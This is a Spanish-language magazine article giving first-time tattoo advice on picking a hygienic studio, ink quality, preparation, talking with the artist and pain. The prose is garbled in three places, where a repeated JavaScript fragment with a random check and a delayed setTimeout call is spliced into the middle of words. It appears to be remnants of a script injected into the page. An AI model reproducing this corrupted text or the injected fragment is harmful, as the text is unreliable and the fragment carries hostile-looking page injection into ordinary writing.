Si decidiste tatuarte, esto es lo que debes saber

    Si decidiste tatuarte, esto es lo que debes saber

    Una vez que esta idea entra a tu cabeza, no hay nada que te pare hasta que lo hagas. Lo sabemos. 

    Autor: Elizabeth Rivera 11 marzo, 2020


    FOTO: Shutterstock

     

     

     

    Si ya tienes en mente lo que quieres y el lugar en tu cuerpo. Ahora sólo necesitas encontrar un buen estudio de tatuajes y listo. 

     

    Si es tu primer tatuaje, seguro que tienes algunas preguntas. Pues aquí estamos para aclarar algunas de las más básicas. Recuerda que no debes tatuarte inmediatamente. Pregúntale al tatuador todas tus dudas y hasta que te sientas seguro, comiencen el trabajo. 

     

    Otra cuestión muy importante es que te tatúes hasta que te sientas satisfecho con el diseño que te proponen, el tamaño y el lugar donde lo portarás. No te sientas presionado, sólo tú decides cuándo y cómo, porque serás tú el que lo tenga en su cuerpo para siempre.

     

    Así que, aquí te dejamos algunas cosas en qué pensar antes de tatuarte:

     

    Escoge bien el estudio de tatuajes

    Evitar a toda cosa acudir lugares clandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andestinos, las condiciones no son las adecuadas. El tatuaje es una herida y si hay polvo el instrumental y las tintas van a estar contaminadas y puedes llegar a tener una infección

    En cuanto al tipo de tinta que se utiliza, esta contiene un porcentaje bajo de minerales o de otros metales pesados que evita daños. Cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando se ha visto que hay infecciones es porque la tinta es de mala calidad.

     

     

    Planéalo con tiempo 

    No vayas con prisa porque no es un proceso del cual vas a entrar y salir en seguida. Todo eso depende de la cantidad de gente que haya dentro del local y el tipo de tatuaje que te hagas, incluso puede que te cancelen el turno y tengas que ir otro día. Ten en mente que si tu tatuaje lleva muchos detalles, quizás lleve más de una sesión.

     

     

    Prepárate la noche anterior

    Sabemos que un primer tatuaje es algo muy emocionante y tal vez quieras brindar por ello pero, te aconsejamos que no tomes la noche anterior porque el alcohol diluye la sangre. 

     

     

    Asegúrate de dormir bien y cómodo, si tu tatuaje es grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande o complicado vas a estar en una misma posición por horas.

     

    Ve bien preparado

    El día del tatuaje come algo antes y toma mucha agua. Es importante estar hidratado y tener el estómago lleno para evitar que te sientas mal o incluso te desmayes.

     

     

    Habla con el artista

    Es importantísima la comunicación con el tatuador. Dile exactamente lo que quieres, cómo lo quiere y no te tatúes hasta que estés satisfecho. Hazle todas las preguntas que necesites y avísale si tienes alguna condición física que pueda complicar la sesión.

     

     

    Sí, los tatuajes duelen

    Esta es la pregunta más común y sí, duele, pero no tanto como crees. En las partes más dolorosas -el cuello, las manos, las plantas del pie, las costillas y las zonas en las que los huesos están más expuestos pueden sentir más, como si alguien te cortara, pero no dura mucho. Además, el dolor es diferente para todos, así que tienes que vivir la experiencia. 

     

    No sólo debes verte bien, también es importante oler bien, así que ELIGE LA FRAGANCIA PERFECTA PARA TI

     

     

    Temas relacionados con esta nota: ,

Una vez que esta idea entra a tu cabeza, no hay nada que te pare hasta que lo hagas. Lo sabemos.